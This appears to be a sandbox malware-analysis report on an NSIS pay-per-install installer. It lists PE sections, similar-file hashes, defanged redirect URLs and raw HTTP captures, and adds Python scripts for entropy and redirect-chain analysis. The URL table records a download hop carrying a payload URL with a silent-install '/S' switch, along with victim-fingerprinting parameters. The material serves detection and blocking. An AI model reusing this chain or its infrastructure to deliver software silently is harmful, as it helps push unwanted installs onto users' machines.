No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 23628 | 24064 | 4.46394 | 856b32eb77dfd6fb67f21d6543272da5 |
.rdata | 28672 | 4764 | 5120 | 3.4982 | dc77f8a1e6985a4361c55642680ddb4f |
.data | 36864 | 154712 | 1024 | 3.3278 | 7922d4ce117d7d5b3ac2cffe4b0b5e4f |
.ndata | 192512 | 57344 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 249856 | 2536 | 2560 | 3.13928 | 7e17f704d3bfebc09c619c31ae04b106 |
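The section table accounts for only 32 KiB of on-disk data (.ndata, the NSIS installer's uninitialised data section, has a raw size of 0 and the MD5 of the empty string), yet the file is 5,122,042 bytes. Almost all of it is therefore an overlay appended after the last section, which for an NSIS installer is the compressed archive; that, rather than a runtime packer, is what the "Entropy: Packed" verdict reflects, and it is consistent with the NSISdl.dll plugin and nsh*.tmp files dropped at run time. The following is example code added to this page, not Lavasoft's tooling. It parses a PE section table, locates the overlay, measures per-section and overlay entropy, and looks for the NSIS first-header marker. The PE it analyses is constructed in memory from the section table above; the raw offsets (first section at 0x400), the section filler bytes and the appended overlay are assumptions made for the example.

```python
"""Locate and characterise the overlay (data appended after the last PE
section) and compute per-section Shannon entropy, the check that explains an
'Entropy: Packed' verdict on a 5 MB file whose sections total 32 KiB.
Example code added to this page, not Lavasoft's tooling. The PE below is
constructed in memory from the section table in the report; its raw offsets
(first section at 0x400), its section contents and the appended overlay are
assumptions made for the example."""
import math
import random
import struct

SECTION_HDR = struct.Struct('<8sIIIIIIHHI')   # IMAGE_SECTION_HEADER, 40 bytes
COFF_HDR = struct.Struct('<HHIIIHH')           # IMAGE_FILE_HEADER, 20 bytes
NSIS_FIRST_HEADER_MAGIC = b'\xef\xbe\xad\xdeNullsoftInst'  # siginfo 0xDEADBEEF + magic

# (name, VirtualAddress, VirtualSize, SizeOfRawData) copied from the report.
REPORTED_SECTIONS = [
    (b'.text',  4096,   23628,  24064),
    (b'.rdata', 28672,  4764,   5120),
    (b'.data',  36864,  154712, 1024),
    (b'.ndata', 192512, 57344,  0),      # NSIS: uninitialised, no bytes on disk
    (b'.rsrc',  249856, 2536,   2560),
]
REPORTED_FILE_SIZE = 5122042


def shannon_entropy(data: bytes) -> float:
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes):
    """Walk DOS header -> PE signature -> COFF header -> section table."""
    if pe[:2] != b'MZ':
        raise ValueError('not an MZ file')
    e_lfanew = struct.unpack_from('<I', pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b'PE\0\0':
        raise ValueError('PE signature not found')
    coff = COFF_HDR.unpack_from(pe, e_lfanew + 4)
    nsections, opt_size = coff[1], coff[5]
    table = e_lfanew + 4 + COFF_HDR.size + opt_size
    sections = []
    for i in range(nsections):
        f = SECTION_HDR.unpack_from(pe, table + i * SECTION_HDR.size)
        sections.append({'name': f[0].rstrip(b'\0').decode('ascii', 'replace'),
                         'vsize': f[1], 'va': f[2], 'raw_size': f[3], 'raw_ptr': f[4]})
    return sections


def overlay_span(pe: bytes):
    """(offset, size) of the data past the last section's on-disk bytes."""
    end = max(s['raw_ptr'] + s['raw_size'] for s in parse_sections(pe))
    return end, max(0, len(pe) - end)


def analyse(pe: bytes) -> dict:
    sections = parse_sections(pe)
    off, size = overlay_span(pe)
    overlay = pe[off:off + size]
    per_section = {s['name']: round(shannon_entropy(pe[s['raw_ptr']:s['raw_ptr'] + s['raw_size']]), 2)
                   for s in sections}
    return {
        'section_entropy': per_section,
        'overlay_offset': off,
        'overlay_size': size,
        'overlay_fraction': size / len(pe),
        'overlay_entropy': round(shannon_entropy(overlay), 2),
        'nsis_ndata': any(s['name'] == '.ndata' and s['raw_size'] == 0 for s in sections),
        'nsis_magic': NSIS_FIRST_HEADER_MAGIC in overlay[:0x1000],
    }


def build_sample_pe(overlay: bytes, header_size: int = 0x400) -> bytes:
    """Constructed PE: real headers, low-entropy filler bodies, caller's overlay."""
    dos = bytearray(64)
    dos[:2] = b'MZ'
    struct.pack_into('<I', dos, 0x3C, 64)                # e_lfanew
    opt = bytearray(0xE0)
    struct.pack_into('<H', opt, 0, 0x10B)                # PE32 magic
    coff = COFF_HDR.pack(0x14C, len(REPORTED_SECTIONS), 0, 0, 0, len(opt), 0x0102)
    raw_ptr, table, bodies = header_size, b'', b''
    for name, va, vsize, raw_size in REPORTED_SECTIONS:
        table += SECTION_HDR.pack(name.ljust(8, b'\0'), vsize, va, raw_size,
                                  raw_ptr if raw_size else 0, 0, 0, 0, 0, 0x60000020)
        bodies += (b'ABCD' * (raw_size // 4))[:raw_size]
        raw_ptr += raw_size
    headers = bytes(dos) + b'PE\0\0' + coff + bytes(opt) + table
    assert len(headers) <= header_size
    return headers.ljust(header_size, b'\0') + bodies + overlay


def sample_overlay(size: int = 64 * 1024, seed: int = 7) -> bytes:
    """Seeded pseudo-random bytes standing in for the compressed NSIS archive,
    prefixed with a simplified first header (flags, siginfo, magic)."""
    rng = random.Random(seed)
    body = bytes(rng.getrandbits(8) for _ in range(size))
    return b'\0\0\0\0' + NSIS_FIRST_HEADER_MAGIC + body


def reported_overlay_fraction(header_size: int = 0x400) -> float:
    """Same arithmetic applied to the report's own numbers."""
    end = header_size + sum(s[3] for s in REPORTED_SECTIONS)
    return (REPORTED_FILE_SIZE - end) / REPORTED_FILE_SIZE


if __name__ == '__main__':
    pe = build_sample_pe(sample_overlay())
    for k, v in analyse(pe).items():
        print(f'{k}: {v}')
    print(f'overlay share of the reported file: {reported_overlay_fraction():.1%}')
```

With the report's section sizes and a 0x400-byte header, the overlay would be about 99.3% of the 5,122,042-byte file; a PEiD match such as the UPolyX signature on such a file should be read as a match on the installer stub, not as identification of a runtime packer, until the overlay has actually been examined.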
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 76
1f80adc186d38569a7f12b37bfb110ae
d75f64a4fc6e1e630f3a51c92ad3c93f
879651a405ee0a51e41803ce9bcb4634
7cbf36c08b44adbda84a760fcb3d5bd5
95259d62d096d69e6c71124d76d2742e
4251897fc31de2b714ccd3c165ed3c22
b958be3153aacfa25cceea183ef7dd3e
891f61a5480eeb26ce51a0fd77355991
6ebad71edda218ef8102afe3432bc334
0ad1ef2f250441d9ae9594b8793c569f
faa24adbd70ff86f783e1419d2115763
723ccdfe9da6d78a751fe606dea351aa
93711c4ab5b6416877a200c6f1a26f70
8eef73e34ed320b0a121902ac1d3ab50
21b13c0e699f2e1a2fc63088e1de4dc1
28cb970d9a603307bbfce338e45bd285
3392bcf5c59acc67d5817989b6ac74bd
4f67278caf52bca6a599c78fd5751400
feb6e129679225efba86b059cca01931
8b6484933de890c4d13e0ffa534de649
defe46a11799c224eb650f9e362aea5d
4270445c87bd8d346291d62413ed0740
5a2b6322d2b8d9a7df6bb0a489d5dae9
2634dc3da87a016d964fbdf1f33bd999
e6333d8fd797d71aae7b43f8c5206cda
Network Activity
URLs
URL | IP |
---|---|
hxxp://46.21.100.248/launch_v2.php?p=sevenzip&pid=145&tid=438526&sid=7 | |
hxxp://d24txo22v2kbr3.cloudfront.net/?affId=1006&appTitle=Installation&s1=145&s2=438526&setupName=cpSetup&appVersion=2.92&instId=11 | |
hxxp://up.freeo9.space/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=145&aff_sub2=438526&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.freeo9.space/offer.php?affId={aff_id}&trackingId=45486395&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 | 52.85.173.161 |
hxxp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=145&aff_sub2=438526&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.freeo9.space/offer.php?affId={aff_id}&trackingId=45486395&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 | 52.16.169.88 |
hxxp://up.freeo9.space/offer.php?affId=1006&trackingId=45486395&instId=11&ho_trackingid=102524c8b7d471e3251121f5c3cd0e&cc=UA&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 | 52.85.173.161 |
hxxp://up.freeo9.space/installer.php?affId=1006&instId=11&ho_trackingid=102524c8b7d471e3251121f5c3cd0e&trackingId=45486395&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 | 52.85.173.161 |
hxxp://set.downor3.space/installer.php?affId=1006&instId=11&ho_trackingid=102524c8b7d471e3251121f5c3cd0e&trackingId=45486395&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 | 54.88.21.193 |
hxxp://dualstack.ils-front-balancer3-264552681.us-east-1.elb.amazonaws/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png | |
hxxp://dualstack.ils-front-balancer3-264552681.us-east-1.elb.amazonaws/index.php | |
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css | |
hxxp://dyno3mlj15jgv.cloudfront.net/V35/amipb.js | |
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/footer_img.png | |
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel1.gif | |
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel.gif | |
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/decline.gif | |
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/skip.gif | |
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/next.gif | |
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/accept.gif | |
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/finish.gif | |
hxxp://dualstack.ils-front-balancer3-264552681.us-east-1.elb.amazonaws/finalize.php | |
hxxp://dualstack.ils-front-balancer3-264552681.us-east-1.elb.amazonaws/Html/7d0e2798-c9e5-442a-a48d-1a3dfc747868/logo.png | |
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/dm_left_image.png | |
hxxp://www.secularistsarakolet.site/index.php | 54.83.41.157 |
hxxp://www.secularistsarakolet.site/finalize.php | 54.83.41.157 |
hxxp://www.secularistsarakolet.site/Html/7d0e2798-c9e5-442a-a48d-1a3dfc747868/logo.png | 54.83.41.157 |
hxxp://www.dosecuretrips.com/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png | 54.83.41.157 |
hxxp://cdn1.downloadcrest.com/V35/amipb.js | 52.85.173.7 |
hxxp://cdn2.downloadcrest.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css | 52.85.173.111 |
hxxp://cdn2.downloadcrest.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel1.gif | 52.85.173.111 |
hxxp://cdn2.downloadcrest.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/decline.gif | 52.85.173.111 |
hxxp://cdn2.downloadcrest.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/dm_left_image.png | 52.85.173.111 |
hxxp://cdn2.downloadcrest.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/footer_img.png | 52.85.173.111 |
hxxp://get.wenter3.space/?affId=1006&appTitle=Installation&s1=145&s2=438526&setupName=cpSetup&appVersion=2.92&instId=11 | 52.85.173.149 |
hxxp://cdn2.downloadcrest.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/accept.gif | 52.85.173.111 |
hxxp://cdn2.downloadcrest.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/finish.gif | 52.85.173.111 |
hxxp://cdn2.downloadcrest.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/next.gif | 52.85.173.111 |
hxxp://cdn2.downloadcrest.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel.gif | 52.85.173.111 |
hxxp://cdn2.downloadcrest.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/skip.gif | 52.85.173.111 |
pe-mik.net | 23.253.126.58 |
pe-sixi.com | |
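The URL table is a pay-per-install hand-off chain: a launch beacon (launch_v2.php with pid/tid), a CloudFront landing page for cpSetup, a redirector on up.freeo9.space, a go2cloud.org tracking link, the offer and installer pages, and finally download.php on www.dosecuretrips.com whose appsetupurl parameter carries the real payload URL on pe-sixi.com together with a silent-install command line (/S). Two details are easy to miss when reading the rows by eye: the nested url= and appsetupurl= values are not percent-encoded, so a naive query-string split scatters the inner URL's parameters over the outer ones, and the same identifiers reappear under different names on each hop (pid/s1/aff_sub, tid/s2/aff_sub2, affId/aff_id). The following is example code added to this page, not Lavasoft's tooling: it refangs the URLs, parses each hop with the nested URL kept intact, and reports the identifiers that stay constant across the chain, the unresolved {placeholder} macros in the tracking-link template, and the parameters that fingerprint the victim host. The URL list is copied from the table; the mapping of parameter names to a common role is an assumption inferred from the values lining up.

```python
"""Reconstruct the pay-per-install redirect chain from the URLs in the report
and pull out the identifiers that tie the hops together. Example code added
to this page, not Lavasoft's tooling. REPORT_URLS is copied from the report
(defanged hxxp:// form); ROLE_ALIASES is an assumption made here, inferred
from values that line up across hops."""
import re
from urllib.parse import urlsplit, parse_qsl

REPORT_URLS = [
    "hxxp://46.21.100.248/launch_v2.php?p=sevenzip&pid=145&tid=438526&sid=7",
    "hxxp://d24txo22v2kbr3.cloudfront.net/?affId=1006&appTitle=Installation&s1=145&s2=438526&setupName=cpSetup&appVersion=2.92&instId=11",
    "hxxp://up.freeo9.space/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=145&aff_sub2=438526&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.freeo9.space/offer.php?affId={aff_id}&trackingId=45486395&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1",
    "hxxp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=145&aff_sub2=438526&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.freeo9.space/offer.php?affId={aff_id}&trackingId=45486395&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1",
    "hxxp://up.freeo9.space/offer.php?affId=1006&trackingId=45486395&instId=11&ho_trackingid=102524c8b7d471e3251121f5c3cd0e&cc=UA&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1",
    "hxxp://up.freeo9.space/installer.php?affId=1006&instId=11&ho_trackingid=102524c8b7d471e3251121f5c3cd0e&trackingId=45486395&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1",
    "hxxp://set.downor3.space/installer.php?affId=1006&instId=11&ho_trackingid=102524c8b7d471e3251121f5c3cd0e&trackingId=45486395&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1",
    "hxxp://www.dosecuretrips.com/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png",
]

# Parameter names that carry the same value under different names on
# different hops (assumed roles).
ROLE_ALIASES = {
    'affiliate': ('affId', 'aff_id'),
    'publisher': ('pid', 's1', 'aff_sub'),
    'campaign':  ('tid', 's2', 'aff_sub2'),
    'tracking':  ('trackingId',),
    'client':    ('cid',),
}
NESTED_PARAMS = ('url', 'appsetupurl')          # values that are unencoded URLs
FINGERPRINT_KEYS = ('sb', 'wv', 'db', 'uac', 'cc')
PLACEHOLDER = re.compile(r'\{[a-z_]+\}')


def refang(url: str) -> str:
    return re.sub(r'^hxxp(s?)://', r'http\1://', url, flags=re.I)


def split_query(query: str):
    """Like parse_qsl, but an unencoded nested URL keeps everything after
    it, its own '&'-separated query included."""
    nested = None
    for name in NESTED_PARAMS:
        m = re.search(r'(?:^|&)' + re.escape(name) + r'=(https?://.*)$', query)
        if m:
            nested = (name, m.group(1))
            query = query[:m.start()]
            break
    return dict(parse_qsl(query, keep_blank_values=True)), nested


def parse_hop(url: str) -> dict:
    parts = urlsplit(refang(url))
    params, nested = split_query(parts.query)
    hop = {'host': parts.hostname, 'path': parts.path or '/', 'params': params,
           'nested': None, 'placeholders': []}
    if nested:
        name, inner = nested
        hop['nested'] = parse_hop(inner)
        hop['nested']['via_param'] = name
        hop['placeholders'] = sorted(set(PLACEHOLDER.findall(inner)))
    return hop


def chain(urls):
    return [parse_hop(u) for u in urls]


def roles(params: dict) -> dict:
    return {role: params[n] for role, names in ROLE_ALIASES.items()
            for n in names if n in params}


def consistent_roles(hops):
    """Roles whose value is identical on every hop that carries them: the
    identifiers that tie the whole chain to one install session."""
    seen = {}
    for h in hops:
        for role, val in roles(h['params']).items():
            seen.setdefault(role, set()).add(val)
    return {r: next(iter(v)) for r, v in seen.items() if len(v) == 1}


def host_fingerprint(hops):
    """Parameters that describe the victim machine rather than the campaign."""
    fp = {}
    for h in hops:
        for k in FINGERPRINT_KEYS:
            if k in h['params']:
                fp.setdefault(k, h['params'][k])
    return fp


def hosts(hops):
    """Every host in the chain, outer and nested, in first-seen order."""
    out = []
    for h in hops:
        for x in (h, h.get('nested')):
            if x and x['host'] not in out:
                out.append(x['host'])
    return out


if __name__ == '__main__':
    hops = chain(REPORT_URLS)
    for i, h in enumerate(hops, 1):
        print(i, h['host'], h['path'], 'placeholders=' + ','.join(h['placeholders']))
    print('constant across hops:', consistent_roles(hops))
    print('host fingerprint:', host_fingerprint(hops))
    print('hosts to block:', hosts(hops))
```

The ci=2140 value on the download.php hop matches the dropped file name Setup__2140_il65.exe and the ESENT\Process\Setup__2140_il65 registry key, and the sb=x86, wv=xpsp3, db=InternetExplorer, uac=1 parameters are the sandbox's own profile being reported upstream; a different host would produce different values there while the affiliate, publisher and campaign identifiers stayed the same.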
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css HTTP/1.1
Accept: */*
Referer: hXXp://VVV.secularistsarakolet.site/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadcrest.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: text/css
Content-Length: 9386
Connection: keep-alive
Date: Sat, 12 Mar 2016 07:10:54 GMT
Content-Disposition: attachment; filename="main.css"
Last-Modified: Thu, 26 Feb 2015 16:19:17 GMT
ETag: "9d7c4ddc39dddc3623e8a57e55afd079"
Accept-Ranges: bytes
Server: AmazonS3
Age: 22932
X-Cache: Hit from cloudfront
Via: 1.1 f17892129c0657c8d9d0809a1b0b00be.cloudfront.net (CloudFront)
X-Amz-Cf-Id: AxpttruDeYPYSaaD03kUx2pK-cZxu3ONjvZIoBiaVKD6A-p8oDEJgQ==
body {.. font-size:10px;. background:#eaeaea;. font-family: Arial;. margin: 0;. padding: 0;. color:#000000; .}..div, span, textarea {. cursor: default;.}..a, a span, a div {. cursor: pointer;.}../* whole screen styles */..ami-wrapper{. background : none no-repeat scroll 0 0 #eaeaea;. border:2px solid #989898; .}../* moddle element */..#ami-body.{..position: relative;. padding-left:27;. padding-right:27;.}...bottom-line{. background-color:#5cafd4;. height:45px;. width:100%;.}..table {. border-collapse: collapse;. margin: 0 ;. padding: 0;. font-size:10px;.}..textarea {..font-size:10px;..font-family: verdana;..width:98%;..padding: 5px;.}...textarea1{. background:#ffffff;. color:#000000;. height:100%;. width:100%;. overflow-x:hidden;.}..td{. padding: 0px;.}../* footer and footer buttons */...bottom-holder{. background-image:url('footer_img.png');. background-repeat:repeat-x;. height:59px;. position:absolute;. bottom:0px;. padding-left:20px;. padding-right:20px;.}...#btnNext{. background: url('next.gif') no-repeat;.}.#btnCancel{. background: url('cancel.gif') no-repeat;.}../* Use for cancle with no popup !!! */.#btnBack{. background: url('cancel1.gif') no-repeat;.}..#btnDecline{. background: url('decline.gif') no-repeat;.}..#btnAccept{. background: url('accept.gif') no-repeat;.}..#btnSkip{. background: url('skip.gif') no-repeat;.}...btn-finish-install{. background: url('finish.gif') no-r
<<< skipped >>>
GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/footer_img.png HTTP/1.1
Accept: */*
Referer: hXXp://VVV.secularistsarakolet.site/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadcrest.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: image/png
Content-Length: 937
Connection: keep-alive
Date: Sat, 12 Mar 2016 07:10:56 GMT
Content-Disposition: attachment; filename="footer_img.png"
Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT
ETag: "e2bf2d203887961a2e93c1a68b7e7534"
Accept-Ranges: bytes
Server: AmazonS3
Age: 22933
X-Cache: Hit from cloudfront
Via: 1.1 f17892129c0657c8d9d0809a1b0b00be.cloudfront.net (CloudFront)
X-Amz-Cf-Id: u73uWAq4qD-60Ao7_6nNmlTDlxjNPOLbwlgDINhDN2Xsl-MbfGFPKQ==
.PNG........IHDR.......;........B....tEXtSoftware.Adobe ImageReadyq.e<...!iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c021 79.154911, 2013/10/29-11:47:16 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmpMM:InstanceID="xmp.iid:E57C9F23EFB911E397DFE4EB8E55B910" xmpMM:DocumentID="xmp.did:E57C9F24EFB911E397DFE4EB8E55B910"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:E57C9F21EFB911E397DFE4EB8E55B910" stRef:documentID="xmp.did:E57C9F22EFB911E397DFE4EB8E55B910"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>........IDATx.b.y........g...?.(....0.....N.]l....IEND.B`.....
GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.secularistsarakolet.site/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadcrest.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 1262
Connection: keep-alive
Date: Sat, 12 Mar 2016 07:10:55 GMT
Content-Disposition: attachment; filename="cancel.gif"
Last-Modified: Thu, 26 Feb 2015 16:19:15 GMT
ETag: "d92b8cccf7616d9e5f6162571dd3e1e8"
Accept-Ranges: bytes
Server: AmazonS3
Age: 33966
X-Cache: Hit from cloudfront
Via: 1.1 f17892129c0657c8d9d0809a1b0b00be.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 6dNBd6XodADlH9Q1FMpzvQgzTaC3tSxjpZ6ijnW3LpbN0wzDzjKQ8w==
GIF89ae......................................................................................................................................................................................................................................................................................................................................................................................................!.....u.,....e........ot.............o..nC.............GCn.t.D.............BC.EF.............EEJ.HHG.............H.J............*..IK.MNM......8.....H..H.`....*....!'O"J.H..D%....P.... C..8......D!.....0c.......4s.....O.....I.h.(S.QY.....K....c...Vg,.......f. 0.k... \..b.. L..@.J...)U.U.b......W.0......t..a.....7..7..."pt.<`...}/..M.o.,...^......_...`...MT.8p.........Z..../.^...j:Y.K.N.zt,,.`...;.)&.h.>....X4.p...z...D. ............................... }.J0...&x...f...-......AH.]pa..(..".A....=.(....p....X#...0#.5. ..A....H&ib.......PF).._x.E...`..^.0...n9..[z........".P..P.@..t..$...!..|....b..F.. ....$.....`....!g.6.j..?..A.[....?t............!d..........v....%.A.c.P@. .0..c.P..cT0@. .. ...P.... ......!gt......m...k..........n.f.AH...k...............p..../.......7.....!...Wl.K..c....C..!l.,..$..r.(....,.<r.".!..n.l..8....<....=.-..o....t....L7...s....;....
<<< skipped >>>
GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/skip.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.secularistsarakolet.site/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadcrest.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 1740
Connection: keep-alive
Date: Sat, 12 Mar 2016 07:10:55 GMT
Content-Disposition: attachment; filename="skip.gif"
Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT
ETag: "7c96892b1948a6e97494e2d58cafe1c0"
Accept-Ranges: bytes
Server: AmazonS3
Age: 24710
X-Cache: Hit from cloudfront
Via: 1.1 f17892129c0657c8d9d0809a1b0b00be.cloudfront.net (CloudFront)
X-Amz-Cf-Id: HoTJ0ZuyLf52bCU6zR4RVXezqb92Nx4JNbiS2eozQl8uRikHkE9fpw==
GIF89ae......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!.......,....e........|"E......*\......?...)....3j...... Cb.....R...\.....0c..I.&K8q........@...J....>...C...:P.J.J.*U.X.:......`...C....h....'...d..= W...x...Cp..=....L..`>}...Q...>b.....N.3~.k..y..>....M.....I...CB..1R......?....1.P............. _.\. :.f..$...@*@..$h. @y....$(P.A..._..O .....O.>.Ct..Idh. B.\.. ..........f.!D.0..D..Uha}..B.!..... .(.....H...Q."..b..! ...[..../4...Vxq.......D.9"!.....L6...O&....L........C... ......ta...$ D./ ...p:YH...h..x.......F....."/<A...0.. .x........J..D......z2B."..*....jj#.(.F.d8....|...#......t..!.$..........[*$.5..#.6....F.l#.0..#%....p...".........!.4.I...R.....m$.A............".T..%.pPC./.@....P.".......!.%......v.1...4.$$.l..(.lr%}HQ..f@.. .`..$..`...l0.'6T@..?.........*cB.%PG-..TW
<<< skipped >>>
GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/accept.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.secularistsarakolet.site/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadcrest.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 3033
Connection: keep-alive
Date: Sat, 12 Mar 2016 07:10:56 GMT
Content-Disposition: attachment; filename="accept.gif"
Last-Modified: Thu, 26 Feb 2015 16:19:15 GMT
ETag: "3484f982bbd281ea323f9dedb47098ed"
Accept-Ranges: bytes
Server: AmazonS3
Age: 23784
X-Cache: Hit from cloudfront
Via: 1.1 f17892129c0657c8d9d0809a1b0b00be.cloudfront.net (CloudFront)
X-Amz-Cf-Id: SUX8o78HrpiDvkT-uAomkPx7KVbDGp-WA7NWCfDq0rpC9U8TqV84ag==
